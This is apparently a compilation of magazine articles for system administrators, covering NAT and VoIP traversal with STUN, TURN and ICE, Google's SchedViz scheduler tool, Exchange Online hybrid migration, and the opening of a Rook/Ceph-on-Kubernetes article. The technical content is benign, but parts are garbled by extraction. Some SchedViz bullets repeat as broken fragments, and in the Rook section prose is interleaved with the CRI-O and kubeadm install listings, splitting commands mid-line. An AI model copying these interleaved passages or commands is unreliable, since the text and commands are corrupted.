As with dynamic address mapping, the NAT component only has to create a corresponding mapping table during the connection setup and, with that, is able to assign the individual connections to the correct IP addresses. The NAT process simply searches the mapping table for the connection to which the packet belongs. If there is a match, the address is converted and forwarded to the right IP address on the internal network – theoretically.
In practice, however, this process is far more complicated. For example, two internal machines communicate with a common external IP address and both transmit a DNS request to the DNS server operated by the ISP for the company in question. The DNS server operated by the ISP resides on the external network from the point of view of the DNS clients, which means that all DNS queries always pass through the NAT process and address conversion always takes place.
The DNS clients transmit their DNS requests to the DNS server on the public network. The packets transmitted to the public IP network thus contain the following IP/TCP/UDP information: the same IP source address, the same IP destination address, and the same destination port number (UDP port 53 for DNS queries). Only the source port numbers differ in the DNS queries, and it is exactly this information that is used to identify the internal connections.
Most operating systems start the assignment of the sender ports with the value 1025 and then assign the source port numbers sequentially to the individual connections.

Under certain circumstances, both IP transmitters can use the same source port numbers for communication with the DNS server. In this case, a conflict is unavoidable. To avoid this statistical possibility of a perfect address equation, the PAT process not only converts the IP addresses but also the port numbers, ensuring that the internal IP components always use an individual port number to communicate with the external IP resources.
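To make the PAT idea concrete, the following nftables commands show roughly what such a many-to-one source NAT ("masquerade") looks like on a Linux gateway. The interface name and the internal address range are placeholders, and the rule set is a generic illustration rather than part of the environment described in this article:

# NAT table with a postrouting chain; everything from the internal range
# leaving through the public interface is masqueraded, and source ports
# are rewritten as needed (the PAT behavior described above).
$ sudo nft add table ip nat
$ sudo nft add chain ip nat postrouting '{ type nat hook postrouting priority 100 ; }'
$ sudo nft add rule ip nat postrouting ip saddr 10.0.0.0/24 oifname "eth0" masquerade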
SIP Log Problems

SIP, according to RFC 3261 [2], is today's standard signaling mechanism for real-time communication streams in an IP environment. However, SIP-based communication also has a flaw: A terminal device on the LAN cannot communicate directly with a communication partner if one or more NAT functions (e.g., in firewalls) exist in the communication channel for security reasons.
When NAT converts IP addresses as described above, some protocols, including SIP, communicate the endpoint addresses when establishing a connection. If the addresses do not match, the terminals do not communicate. Several NAT traversal methods can now be used to eliminate this problem – but more about that later.

NAT Traversal and VoIP

One tried and tested means for working around NAT components is manual device configuration, wherein NAT is configured to forward certain data packets to a specific local computer. NAT usually determines forwarding on the basis of the destination port in the data packet and therefore requires a port number (or port range) and the IP address of the local computer for port forwarding. With the help of fixed forwarding by port number, the local computer outside the network can be reached on a fixed port (range); a sample forwarding rule follows the list below. The big advantage of port forwarding is that it is the only NAT traversal technique that actually works for many applications, although it is offset by a number of important disadvantages:
• Other local computers cannot use this port because of the fixed assignment of a port number to a specific computer.
• Many applications select the port dynamically, making it difficult to determine beforehand or to select a port from a port range.
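As an illustration of such a fixed forwarding rule, the nftables snippet below (reusing the nat table from the previous example) sends SIP signaling arriving on the public interface to one internal phone or PBX. The addresses, interface, and port are placeholders, not values taken from the article:

# Forward inbound SIP signaling (UDP 5060) to an internal host.
$ sudo nft add chain ip nat prerouting '{ type nat hook prerouting priority -100 ; }'
$ sudo nft add rule ip nat prerouting iifname "eth0" udp dport 5060 dnat to 10.0.0.5:5060

Keep in mind that forwarding the signaling port alone is rarely enough for VoIP; the RTP media ports negotiated in the SDP must also reach the internal device.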
The STUN mechanism for transparently routing VoIP streams across NAT systems enables a VoIP endpoint to determine the correct public IP address, provides a mechanism for checking connections between two endpoints, and provides additional mechanisms for maintaining NAT address mappings using a keepalive protocol (Figure 3).

Figure 3: A sample sequence for the STUN mechanism.

An earlier version of STUN described in RFC 3489 [3] – now referred to as "classic STUN" – required a complete revision of the STUN concept on the basis of experience gained in practice. The new STUN (according to RFC 5389 [4]) is now just a mechanism used in conjunction with other specifications (e.g., SIP-OUTBOUND, TURN, and ICE).
The task of a standalone STUN server is to provide the correct transport addresses using the STUN binding function. A STUN server must be able to send and receive messages by the UDP and TCP protocols. A plain vanilla STUN server provides only a partial solution to the problem of correct transfer over NAT gateways. For this reason, a STUN server always collaborates with other components. STUN is more like a tool within a more comprehensive NAT gateway solution. The following STUN uses are currently defined:
• Interactive connectivity establishment (ICE)
• Client-oriented SIP connections to external resources (SIP-OUTBOUND)
• NAT behavior discovery (BEHAVE-NAT)
For VoIP endpoints, STUN provides a mechanism for correctly determining the IP address and the port currently used at the other end of a NAT gateway or router (transition between the private and a public IP address range). In contrast to classic STUN, the information can be transmitted over TCP as well as UDP. The new STUN can also be used to negotiate optional attributes and authentication with VoIP servers.
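If you simply want to see what a STUN server reports as your public transport address, a command-line client is enough for a quick test. The example below assumes the stunclient utility from the STUNTMAN project is installed and uses its public test server; any reachable STUN server will do:

# Ask a public STUN server which address and port your requests appear to come from.
$ stunclient stun.stunprotocol.org 3478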
TURN as a Last Resort

STUN enables a client to determine the correct transport address on which the terminal device can be reached from the public network. If direct communication between the two SIP terminals is not possible and STUN does not provide functional address mapping, the services of a relay computer are used. This mechanism was published in RFC 5766 – "Traversal Using Relays Around NAT (TURN)" [5].
The goal of TURN is to provide the client a publicly accessible address/port tuple even in these situations. The only way to achieve this in all cases is to route the data through a TURN server that can be reached on the public network. For this purpose, a client on the TURN server can request an endpoint on which it will then be publicly accessible. The server will then forward the packets to the client.
Because TURN behaves like port-restricted NAT here, the process does not undermine the security functions of NAT and firewalls. For a client that has defined an endpoint on a server via TURN, it must first send a packet to the clients from which it wants to receive packets. Operating servers on well-known ports behind NAT is therefore not possible. The protocol is based on STUN and shares its message structure and basic mechanisms.
Although TURN always makes it possible to establish a connection, redirecting all traffic through the TURN server places a heavy load on the server. Therefore, TURN should only be considered as a last resort if other methods like STUN do not lead to success.

ICE as a Lubricant

In 2004, the IETF began to develop the ICE technique.


For any type of session protocol, ICE ensures trouble-free passage through all types of NAT and firewalls. ICE was designed so that the required addressing functions can be implemented with the SIP protocol and thus also with the Session Description Protocol (SDP). ICE acts as a uniform framework around STUN and TURN. Additionally, ICE supports TCP as well as UDP media sessions.
Instead of only STUN or TURN, an ICE client is able to determine the required addresses with both methods. Both addresses are transmitted to the communication partner along with the local interface addresses in the subsequent SIP call setup message. The elements of the address information contained in the invitation message are known as the "candidates," which are the potential communication endpoints for the SIP agent. When an invitation message reaches the call recipient, the latter also runs the ICE address collection functions and transmits specific addresses in its SIP reply. Both agents then check the possible connections that are implemented by STUN messages from an agent to the other end of the communication path. A check is performed to discover which pair of candidates works. Once a functioning pair of candidates has been found, the media stream begins to flow between the two communication partners.
ICE goes through six steps to establish a connection:
Step 1. The call initiator collects the IP and port addresses of all potential communication candidates before the actual call. The first candidates are sought by the interfaces of the local computer (host). If the host has several interfaces, the agent obtains a candidate from each interface. The candidates of the computer interfaces (including virtual interfaces) are referred to as host candidates. The agent then directly contacts the STUN server on any host interface.


The results of these tests are server-reflexive candidates, which translate to the IP and port addresses of the outermost NAT on the path between the agent and the STUN server, which is usually the NAT facing the public Internet. Finally, the agent also receives all the candidates from TURN servers. These IP and port addresses reside on the relay servers.
Step 2. Each candidate is prioritized after the agent has collected its candidates. The highest priority defines the candidate to be used. As a rule, relay candidates receive the lowest priority because they have the highest voice delay.
Step 3. According to the identified and prioritized candidates, the agent generates its SIP INVITE request to establish the call. The SDP header is part of the INVITE request, which the caller uses to transmit the connection information required for the call, including the codec, its parameters, and the IP and port addresses to be used. ICE extends SDP by adding some new attributes. The most important of these is the candidate attribute. Because the agent might know more than one possible candidate, it transmits a separate candidate attribute in the SDP header for each possible media stream. The attribute contains the IP and port addresses for the candidate concerned, its priority, and the type of candidate (host, server reflexive, or relay). Additionally, the SDP message contains information for safeguarding the STUN functions.
Step 4. SIP transmits the SIP INVITE message with the corresponding SDP information over the network. If the called agent also supports ICE, the phone will ring. The party being called collects its candidates and generates a preliminary SIP response, which signals to the caller that the SIP request is still being processed. The preliminary response contains an SDP message with the communication partner's candidates.
Step 5. The caller and the called party have exchanged the necessary SDP messages. The agents involved in the call know all candidates for transferring the media streams. Note that certain applications (e.g., videophones) generate more than one media stream. ICE then performs the most important part of its tasks. Each agent pair knows the possible candidates and the corresponding candidates of its peer – the list of possible candidate pairs. Each agent calculates the priority of the candidate pairs (combined priority of the individual candidates), and the candidate couple with the highest priority has the optimal path between the two communication partners.
Step 6. For the final review of the candidate pair, ICE conducts connection checks on the basis of STUN transactions from each agent. The STUN transactions use the IP and port addresses of the selected candidate pairs, which grow in proportion to the square of the number of candidates, and control their bidirectional accessibility. This process makes a parallel review of each candidate pair problematic. ICE checks the candidate pairs sequentially by priority. Every 20ms each agent generates a STUN transaction for the next pair of candidates in the list. If an agent receives a STUN request for a candidate pair, it immediately generates a STUN transaction in the opposite direction, known as a triggered check, accelerating the entire ICE process. After completing the review of a candidate pair, the agent knows that it has found a connection pair for transmitting the media stream correctly. Because the checks are carried out according to the priorities of the candidate pairs, the first functioning candidate pair represents the best possible connection between the two communication partners at the given time. The caller usually confirms the candidate pair found by this process to the other agent, concluding the selection process.
All previous processes (candidate collection and connection tests) take place before the phone rings at the called agent's end; consequently, the connection setup is minimally delayed by ICE. The advantage, however, is that ghost calls and misconnections (i.e., the phone rings, but the called party hears nothing) are eliminated.
If the ICE handshake reveals that the candidate pair differs from the default setting selected in the SDP message (IP and port addresses), the caller initiates an update of the default setting on the basis of a SIP re-INVITE message to synchronize all intermediate SIP elements that do not support ICE but need to know through which addresses the media streams are running.

Conclusions

Correct mapping of the internal IP addresses to external IP addresses is essential to enabling unhindered VoIP communication through NAT gateways and firewalls. STUN, TURN, and ICE not only ensure a transparent transition via NAT gateways but also improve the security of the SIP environment as a whole.

Info
[1] RFC 3022: [https://tools.ietf.org/html/rfc3022]
[2] RFC 3261: [https://tools.ietf.org/html/rfc3261]
[3] RFC 3489: [https://tools.ietf.org/html/rfc3489]
[4] RFC 5389: [https://tools.ietf.org/html/rfc5389]
[5] RFC 5766: [https://tools.ietf.org/html/rfc5766]


Visualizing kernel scheduling

Behind Time
The Google SchedViz tool lets you visualize how the Linux kernel
scheduler allocates jobs among cores and whether they are being
usurped. By Samuel Bocetta

SchedViz [1] is one of a variety of open source tools recently released by Google that allows you to visualize how your programs are being handled by Linux kernel scheduling. The tool allows you to see exactly how your system is treating the various tasks it is running and allows you to fine-tune the way resources are allotted to each task.
SchedViz is designed to overcome a specific problem: The basic Linux tools available for scheduling [2] don't allow you to see very much. In practice, this means that most people guess how to schedule system resources, and given the complexity of modern systems, these guesses are often wrong.

Multiprocessing

Modern operating systems (OSs) execute multiple processes simultaneously by splitting the computing load across multiple cores and running each process for a short time before switching to a different task (multiprocessing). This feature presents a significant challenge for engineers: Where should each process run and for how long? How should you assign priority to the various tasks that your system needs to run?
A round-robin approach would assign each task processing time in such a way that each would receive equal time. In practice, however, some tasks – such as those related to the core functions of your OS – are of higher priority than others.
SchedViz makes use of a basic feature of the Linux kernel: the ability to capture data in real time about what each core of a multicore system is doing. The kernel is instrumented with hooks called tracepoints; when certain actions occur, any code hooked to the relevant tracepoint is called with arguments that describe the action. This data is referred to as a "trace."
SchedViz captures these "traces" and allows you to visualize them. A command-line script can capture the data over a specified time and then load it into SchedViz for as much analysis as you care to apply.

Figure 1: In this example, each horizontal bar represents a core, and the horizontal axis is measured in milliseconds. The blue process, running on one core, has been interrupted by the green process, which briefly swaps the core on which it runs.


You can also keep saved traces to compare any modification you make.
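The raw material here is nothing more exotic than the kernel's scheduler tracepoints, which you can also record with generic ftrace front ends. The trace-cmd call below is a generic illustration of capturing sched events for a few seconds; it is not the SchedViz collection script itself (see the project documentation for that):

# Record scheduler tracepoints system-wide for about ten seconds,
# then print a summary of the recorded events.
$ sudo trace-cmd record -e sched:sched_switch -e sched:sched_wakeup sleep 10
$ trace-cmd report | head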
A basic example of a trace loaded into SchedViz for viewing is seen in Figure 1. Two processes are running simultaneously (green and blue). The blue process, known as the "victim thread," is likely to suffer a performance lag because it has been interrupted by the green process, which has swapped in to the blue thread's core.
In practice, behavior like that in Figure 1 is likely to result in suboptimal performance. There is no obvious reason why the green process swapped cores right at the end of its processing time, but by doing so, it interrupts another thread running on a different core. If the blue process needs to run quickly, particularly if it is a critical system process, you would like to stop this kind of behavior.
SchedViz allows you to see issues like this on a pannable, zoomable graph that shows all the cores of a multicore system. A more detailed trace of a three-core system is seen in Figure 2. Although it might seem inefficient to allocate resources in this way, with each process getting a short period of time before the core swaps to another process, this is how typical core-scheduling processes work.

Figure 2: The core at the bottom is alternating between two threads (yellow and blue).

The SchedViz visualization tool aims to achieve a number of key goals:
• Quantify task starvation caused by round-robin queueing. In the above example, it might be that the blue process is running slowly because the yellow process is assigned the same priority. This case is known as "task starvation," and can be a significant drain on performance in complex systems.
• Identify primary antagonists stealing work from critical threads. Some processes, as seen, steal a lot of resources from others that may be more important. The "primary antagonists" are the biggest drain on the performance of many systems, and finding out which processes are acting in this way is extremely useful.
• Determine when core allocation choices yield unnecessary waiting. In other situations, a process that you would like to prioritize is made to wait while another executes. SchedViz allows you to see this happening.
• Evaluate different scheduling policies. Linux has many ways of implementing scheduling policies [3] that determine which processes will run where and for how long. If you are seeking to improve system performance by manipulating these policies, SchedViz is invaluable, because it allows you to see a visual representation of how they are being applied.
At the moment, the primary use that most system administrators will have for SchedViz is to manage the way tasks are assigned across multicore processors. As Google put it in their blog, "not all cores are equal" [1], and that's because the structure of the memory hierarchy found in most modern systems can make it costly to shift a thread from one core to another, especially if that shift moves it to a new non-uniform memory access (NUMA) node [4]. This move is particularly a problem when it comes to handling modern encryption algorithms [5] that are becoming an integral part of working with web services and cloud storage.
Users can already pin threads explicitly to a CPU or a set of CPUs or can exclude threads from specific CPUs with the use of features like sched_setaffinity() [6] or cgroups [7], which are both available in most Linux environments. However, such restrictions can also make scheduling even tougher. SchedViz allows you to see exactly how and when these rules are being enforced, allowing you to assess their effectiveness.
Q Identify primary antagonists steal-
ing work from critical threads.
Some processes, as seen, steal a
lot of resources from others that
may be more important. The “pri-
mary antagonists” are the biggest
drain on the performance of many
systems, and finding out which
processes are acting in this way is
extremely useful.
Q Determine when core allocation
choices yield unnecessary waiting. Figure 2: The core at the bottom is alternating between two threads (yellow and blue).


sudo apt-get update && sudo apt-get install build-essential unzip

Before running SchedViz for the first time, change to the location where the repo was cloned and install with Yarn:

cd schedviz
yarn install

Once it has finished, navigate to the root of the repo folder and start up your server:

yarn bazel run server -- -- --storage_path="<Path to folder that stores traces>"

This command takes several options (Table 1).

Table 1: bazel Options

Name | Type | Description
storage_path | String | Required. The folder where you want trace data to be stored. This should be an empty folder that is not used by anything else.
cache_size | Int | Optional. The maximum number of collections to keep open in memory at once.
port | Int | Optional. The port to run the server on. Defaults to 7402.
resources_root | String | Optional. The folder where the static files (e.g., HTML and JavaScript) are stored. Default is client. If using bazel to run the server, you shouldn't need to change this.

Using SchedViz

The most basic function of SchedViz is to collect a trace of activity from a particular machine. To do this, run the command:

sudo ./trace.sh -out '<Path to trace directory>' -capture_seconds '<No. of seconds>' [-buffer_size '<Size of trace buffer>'] [-copy_timeout '<Time to wait>']

The options taken by this command all contain default values if you don't want to specify them. The default number of seconds to record a trace is 5, the default buffer size is 409KB, and the default number of seconds to wait for a copy to finish is 5.
Once the command is run on the target machine [10], move the tar.gz file to a machine that can use the SchedViz user interface. To look at the data you've collected, click Upload Trace on the SchedViz collections page (Figure 3). A list of all the traces you have loaded into SchedViz is presented that can be sorted by the date they were collected, by a description of the traces, or by the user who collected them.

Figure 3: The collections page is the main SchedViz menu. From here, you can perform all of the core functions of the program.

Opening a trace from the collections menu will open a visualization similar to those shown in the figures here, with a representation of all the cores on your system and what each is doing.
What you do with this information will depend on your requirements. Google has provided a guide [1] that explains how to spot common problems in SchedViz traces, where a particular process might be causing your system performance to lag. These issues can then be addressed by looking at your scheduling policies and adapting them to the needs of your system.

Going Further: NUMA Issues

Google has also highlighted SchedViz's ability to do more than just look at how processing resources are shared according to the CPU time given to each. SchedViz also provides a powerful way to visualize the way larger systems work with NUMA nodes.
Larger servers often have several NUMA nodes that are a subset of DRAM memory assigned to particular cores that can be accessed more quickly than the general memory pool. Cores can access NUMA nodes assigned to other cores, and often do if the cores are overworked; however, this process is much slower than if the cores stuck to their own NUMA node. This nonuniformity is a practical consequence of growing core count, but it brings challenges.
If a core jumps to a different NUMA node, performance can be affected significantly, because it will then have to pay an extra tax for each DRAM access. SchedViz can help identify cases like this, making it clear when a thread has had to migrate across NUMA boundaries. Moreover, SchedViz can show you which NUMA nodes are in use at any one time, helping to identify situations in which one part of your machine is overtaxed while the other part sits idle. A typical trace of that situation will look like Figure 4. SchedViz can identify an unbalanced system like this, so the sys admin can adjust the NUMA behavior [11] to fix the issue.
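SchedViz shows you where the problem is; fixing it happens with the usual Linux NUMA tools. As a hedged illustration (my-workload is a placeholder, and the numactl and numastat utilities may need to be installed first), you can inspect the topology and bind a process to a single node so it stops paying the remote-access tax:

# show the NUMA nodes of the machine with their CPUs and memory sizes
numactl --hardware

# run a process confined to the CPUs and memory of node 0
numactl --cpunodebind=0 --membind=0 ./my-workload

# per-node allocation counters; a growing numa_miss value points to allocations off the preferred node
numastat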


Figure 4: All available NUMA nodes are at the right, with their usage on the left. Apparently, this system is very unbalanced.

Further Resources

If you want to explore the features that come packaged with SchedViz, take a look at the detailed features walkthrough [12] provided by Google. This document will show you how to collect various types of traces and how to use the tools available for analyzing them.
Another very useful feature provided by the kernel is a debug feature [13] that can analyze trace data and stream it to a buffer for later analysis, providing you with a quick way of highlighting scheduling or scheduling rules problems.
At the moment, SchedViz is primarily useful for tracking scheduling errors and fine-tuning the way you assign computing resources. Although that's pretty useful in itself, plans are in progress to make it even more powerful in the future. Beyond using SchedViz for figuring out kernel scheduler defects, Google is also looking at using it to visualize other kernel tracepoints to analyze other kernel behavior that could be optimized for better efficiency, so watch this space.

Info
[1] Understanding scheduling behavior with SchedViz: [https://opensource.googleblog.com/2019/10/understanding-scheduling-behavior-with.html]
[2] "Command Line – at, cron, and anacron" by Bruce Byfield, Linux Magazine, issue 225, December 2019, pg. 50: [http://www.linux-magazine.com/index.php/Issues/2019/225/Command-Line-at-cron-anacron/]
[3] Scheduling policy: [https://www.oreilly.com/library/view/understanding-the-linux/0596005652/ch07s01.html]
[4] NUMA: [https://en.wikipedia.org/wiki/Non-uniform_memory_access]
[5] "What is AES Encryption?" by Will Ellis: [https://privacyaustralia.net/complete-guide-encryption/]
[6] sched_setaffinity: [https://linux.die.net/man/2/sched_setaffinity]
[7] cgroups: [https://www.kernel.org/doc/Documentation/cgroup-v1/cgroups.txt]
[8] SchedViz on GitHub: [https://github.com/google/schedviz]
[9] Yarn: [https://www.yarnpkg.com/en/]
[10] "30 Linux Commands Every User Should Know" by Arturas B.: [https://www.hostinger.com/tutorials/linux-commands]
[11] "NUMA overview" by Christoph Lameter: [https://queue.acm.org/detail.cfm?id=2513149]
[12] SchedViz features and usage walkthrough: [https://github.com/google/schedviz/blob/master/doc/walkthrough.md]
[13] ftrace: [https://www.kernel.org/doc/Documentation/trace/ftrace.txt]

The Author
Sam Bocetta is a former defense contractor for the US Navy. He turned to freelance journalism in retirement, focusing on US diplomacy and national security, as well as technology trends in cyberwarfare, cyberdefense, and cryptography. When not writing articles, Sam can be found in his "study" (actually a converted space above his garage) working on his first book – an exploration of how to democratize personal privacy solutions for the broader public – which will be published in 2020.


Exchange Online migration with the Hybrid Agent

Mailbox
Migration
Exchange’s Hybrid Agent takes the complexity out of migrating
from a local Exchange environment to Exchange Online.
By Christian Schulenburg

When it comes to leveraging the full Office 365 feature set, migrating mailboxes to Exchange Online is one of the greatest challenges. Unlike migrating within an organization, moving to Exchange Online is problematic, because mailboxes are shifted between two separately managed organizations.
This connection between an on-premises Exchange instance and Exchange Online is known as a hybrid connection. Microsoft refers to this connection as the Exchange Modern Hybrid and has extended its Hybrid Configuration Wizard (HCW) with Hybrid Agent (Figure 1) to facilitate the connection. With HCW, Hybrid Agent establishes a connection between the local Exchange and Exchange Online, reducing the requirements for external DNS records, certificate updates, and incoming firewall network connections – all of which made the task complex in the past.

Multiple Choices

Hybrid Agent does not support Hybrid Modern Authentication, which includes, for example, multifactor authentication and authentication with client certificates. If your setup uses Hybrid Modern Authentication, you need to keep on using the classic Exchange Hybrid topology. Additionally, Hybrid Agent does not cover MailTips, Message Tracking, and Multi-Mailbox Search. If your setup uses these functions across the board, again, keep on using the classic model.
Hybrid Agent is constantly being optimized – improvements to the preview were delivered just two months after the first launch. In its first release in February 2019, Hybrid Agent only supported a single installation, which was a big limitation because it offered no redundancy options, free/busy information could not be viewed in an offline scenario, and move actions were not carried out. With the April 2019 updated version, several agents now can be installed in a local organization, and you can now view status information for Hybrid Agent and use Hybrid Agent instead of specific Exchange servers to address load balancers.

Hybrid Agent Preparation

You can install Hybrid Agent either on a standalone server (agent server) or on an Exchange server with the Client Access Server (CAS) role. Exchange 2010 or newer is required. It must be installed on Windows Server 2012 R2 or 2016 with .NET Framework 4.6.2 or higher. If Hybrid Agent and Exchange are set up on a server, you need to ensure compatibility between Exchange and .NET [1] to avoid the use of an unsupported combination. Beyond this, the server only needs to be a domain member and have access to the Internet.
The only required outbound connections are ports 443 and 80; the latter is only used for certificate revocation list checks. The agent communicates with Azure Application Proxy, an Azure proxy service with a client-specific endpoint that leads to your online environment. Availability information and mailbox migrations are managed by the Azure Application Proxy. If the agent is not installed on an Exchange server with CAS, you also need to enable ports 5985 and 5986 to the CAS servers so communications actually work. Additionally, all CAS servers need to be able to connect to Office 365 over port 443 to retrieve available/busy information.
Microsoft provides a script [2] for checking the connection settings before installation.


Start by integrating the script as follows:

Import-Module .\HybridManagement.psm1

The following call runs the actual test:

Test-HybridConnectivity -testO365Endpoints

For everything to run smoothly, you need to make sure that at least one identical email domain is set up as the accepted domain in each Exchange organization.

Installing the Agent

Hybrid Agent is part of the Office 365 HCW. The installer automatically downloads the latest version of Hybrid Agent in the background. The easiest way to start HCW is in the Exchange Admin Center (EAC) from the Hybrid menu item. HCW (Figure 2) is a click-to-run application that you download directly from Microsoft – the latest version is always launched. To run it, you need to be an Exchange Online global administrator. You can see the HCW version number in the top right corner, and further information is added during the next few steps.

Figure 1: The Exchange Modern Hybrid topology with the new Hybrid Agent removes a number of challenges in the connection between a local installation and Exchange Online.

After launching, select a local Exchange server that is configured for the hybrid connection. To continue, the server needs to be licensed. You can also license an Exchange Hybrid server at this point. When using the Hybrid license, no mailboxes can reside on the server. You also need to select the target platform, which is where you enter the location of your online environment – this could be a cloud environment or the standard Microsoft environment.
First, you will be prompted to choose your hybrid configuration. Hybrid Agent is available in two variants: minimal and full. The full Hybrid configuration is primarily intended for long-term coexistence and takes the mail flow, eDiscovery, and sharing of available/busy information into account. Because the minimal configuration is mainly designed to transfer mailboxes to Exchange Online seamlessly, I am selecting the minimal configuration here. If you do not see the Hybrid configuration window, you have already successfully set up a hybrid topology.

Figure 2: The HCW guides you through the configuration and starts the Hybrid Agent.

Next, you need to check the domain ownership. Verification is similar to domain verification in Office 365: Enter the displayed DNS-TXT record in your DNS zone and confirm ownership. Now select the topology. Hybrid Agent is offered to you as part of the Exchange Modern Hybrid topology, which you can download after confirming.
Once this is done, set up the send and receive connectors. Email traffic is secured by TLS; you need to select a valid certificate for this in the next step. The external hostname must be entered in the certificate; it must be possible to resolve this name externally, and it must be accessible over port 25. Hybrid Agent is not responsible for routing email, only for making the appropriate configurations.


You can see the result after completion of the configuration in the EAC under mail flow | connectors.
After you have entered the specifications, the corresponding configuration is performed in the Exchange organizations. If all goes well, this completes the hybrid connection between your on-premises Exchange instance and Exchange Online. During the installation, shortcuts are also created on the server; you can use them to restart the HCW in case of changes in your Exchange organization.

Test Connection

Once the hybrid connection has been set up, you need to test a number of features. First, check email transport by sending messages back and forth between local and online mailboxes. You will also want to test accessibility from an external source.
Next, try creating mailboxes. You can now create mailboxes for Exchange Online in the local EAC (Figure 3), although you may experience a short delay before the account becomes available in Office 365. First, you need to assign a license to the account so that the user can log in to the mailbox. Second, migrate some mailboxes in Office 365 from your local environment to Exchange Online. To do this, go to the Exchange Online EAC and select recipients | migration and then Migrate to Exchange Online. Third, test the client experience by checking the available/busy information for mailboxes from different environments in a new event.

Figure 3: After successfully connecting the environments, mailboxes in Exchange Online can be set up using the local environment.

Between Two Worlds

Admins need to be aware that the two Exchange organizations are independent of each other in terms of configuration. In the EAC, you can quickly switch between the two worlds with the Enterprise and Office 365 tabs. Basically, policies such as the Retention Policy, OWA Policy, or Mobile Device Policy need to be created and configured separately. The Organization Configuration Transfer (OCT) wizard helps you migrate the settings. The first OCT version was released in June 2018 and only supported the guidelines at that time. The next version (released in October 2018) added features, such as Active Sync Device Access Rule, Address List, and Policy Tip Config.
The first version only supported the initial transfer; in other words, if the wizard saw a setting with an identical name, it was just ignored. The second version now overwrites settings in Exchange Online. Although this is not the same as synchronization, it is an easy way to transfer settings quickly. OCT requires the latest cumulative update locally and supports Exchange Server 2010 or newer. OCT is part of the HCW; you select the transfer during hybrid configuration.

The Last Exchange Server Standing

Once all the mailboxes have been migrated to Exchange Online, you can uninstall the last Exchange server, but only if you will not be synchronizing the users with Azure Active Directory (AD) Connect, which integrates your local directories into Azure AD, giving users a single identity. Because it is not a prerequisite for the use of a hybrid configuration, I won't discuss it in detail here.
If you use this function, you need an Exchange server to maintain the local Exchange attributes. If no local Exchange server is available, the Exchange extensions for the AD objects, which are essential for smooth hybrid operation with Office 365, are missing. As a result of this requirement, you need to continue to import Exchange updates, including potential schema extensions.

Conclusions

Microsoft has removed the complexity from migrating between local Exchange environments and Exchange Online. Even small and medium-sized enterprises, which Microsoft identifies as potential users of Office 365, can benefit from an easier migration, thanks to Hybrid Agent.

Info
[1] .NET and Exchange support matrix: [https://docs.microsoft.com/en-us/exchange/plan-and-deploy/supportability-matrix?view=exchserver-2019]
[2] Microsoft Hybrid Agent Public Preview: [https://techcommunity.microsoft.com/t5/exchange-team-blog/the-microsoft-hybrid-agent-public-preview/ba-p/608939]


Optimally combine Kubernetes and Ceph with Rook

Castling
Ceph distributed storage and Kubernetes container orchestration come together with Rook. By Martin Loschwitz

Hardly a year goes by that does not see some kind of disruptive technology unfold and existing traditions swept away. That's what the two technologies discussed in this article have in common. Ceph captured the storage solutions market in a flash. Meanwhile, Kubernetes shook up the market for virtualization solutions, not only grabbing market share off KVM and others, but also off industry giants such as VMware.
When two disruptive technologies such as containers and Ceph are mixing up the same market, collisions can hardly be avoided. The tool that brings Ceph and Kubernetes together is Rook, which lets you roll out a Ceph installation to a cluster with Kubernetes and offers advantages over a setup where Ceph sits "under" Kubernetes.
The most important advantage is undoubtedly that Ceph integrated into the Kubernetes workflow with the help of Rook [1] can be controlled and monitored just like any other Kubernetes resource. Kubernetes is aware of Ceph and its topology and can adapt it if necessary. However, a setup in which Ceph sits under Kubernetes and only passes persistent volumes through to it, knowing nothing about Ceph, is not integrated and lacks homogeneity.

Getting Started with Rook

ADMIN introduced Rook in detail some time ago [2], looking into its advantages and disadvantages. Since then, much has happened. For example, if you work with OpenStack, Rook will be available automatically in almost every scenario. Many OpenStack vendors are migrating their distributions to Kubernetes, and because OpenStack almost always comes with Ceph in tow, Kubernetes will also include Ceph. However, I'll show you how to get started if you don't have a ready-made OpenStack distribution – and don't want one – with a manual integration.

The Beginnings: Kubernetes

Any admin wanting to work with Rook in a practical way first needs a working Kubernetes, for which Rook needs only a few basic necessities. In this article, I do not assume that you already have a running Kubernetes available, which gives those who have had little or no practical experience with Kubernetes the chance to get acquainted with the subject.


to get acquainted with the subject. recently, this was almost automati- Listing 1: Installing CRI-O
Setting up Kubernetes is not compli- cally Docker, but not all of the Linux
cated. Several tools promise to handle community is Docker friendly. An # modprobe overlay
this task quickly and well. alternative to Docker is CRI-O [3], # modprobe br_netfilter

which now officially supports Ku-


[ ... required Sysctl parameters ... ]
Rolling Out Kubernetes bernetes. To use it on Ubuntu 18.04,
# cat > /etc/sysctl.d/99-kubernetes-cri.conf <<EOF
you need to run the commands in
net.bridge.bridge-nf-call-iptables = 1
Kubernetes, which is not nearly as Listing 1. As a first step, you set net.ipv4.ip_forward = 1
complex as other cloud approaches several sysctl variables; the actual net.bridge.bridge-nf-call-ip6tables = 1
like OpenStack, can be deployed in an installation of the CRI-O packages EOF
all-in-one environment by the kubeadm then follows.
tool. The following example is based The systemctl start crio command # sysctl --system
on five servers that form a Kubernetes starts the run time, which is now
instance. available for use by Kubernetes. [ ... Preconditions ... ]
If you don’t have physical hardware Working as an admin user, you need # apt-get update
# apt-get install software-properties-common
at hand, you can alternatively work to perform these steps on all the serv-
# add-apt-repository ppa:projectatomic/ppa
through this example with virtual ers, not just on the Control Plane or
# apt-get update
machines (VMs); note, however, that the future Kubelet servers.
Ceph will take possession of the hard [ ... Install CRI-O ... ]
drives or SSDs used later. Five VMs Next Steps # apt-get install cri-o-1.13
on the same SSD, which then form
a Kubernetes cluster with Rook, are Next, complete the steps in Listing 2
probably not optimal, especially if to add the Kubernetes tools kubelet, Listing 2: Installing Kubernetes
you expect a longer service life from kubeadm, and kubectl to your systems. # apt-get update && apt-get install -y
the SSD. In any case, Ceph needs at Thus far, you have only retrieved the apt-transport-https curl
least one completely empty hard disk components needed for Kubernetes # curl -s https://packages.cloud.google.com/apt/doc/
in every system, which can later be and still do not have a running Ku- apt-key.gpg | apt-key add -
used as a data silo. bernetes cluster. Kubeadm will install # cat <<EOF >/etc/apt/sources.list.d/kubernetes.list
this shortly. On the node that you deb https://apt.kubernetes.io/ kubernetes-xenial main
EOF
Control Plane Node have selected as the Control Plane,
# apt-get update
the following command sets up the
# apt-get install -y kubelet kubeadm kubectl
Of five servers with Ubuntu 18.04 required components:
# apt-mark hold kubelet kubeadm kubectl
LTS, pick one to serve as the Kuber-
netes master. For the example here, # kubeadm init U
the setup does without any form of --pod-network-cidr=10.244.0.0/16 As a Kubernetes admin, you can-
classic high availability. In a produc- not avoid the network. Although
tion setup, any admin would handle The --pod-network-cidr parameter is not nearly as complicated as with
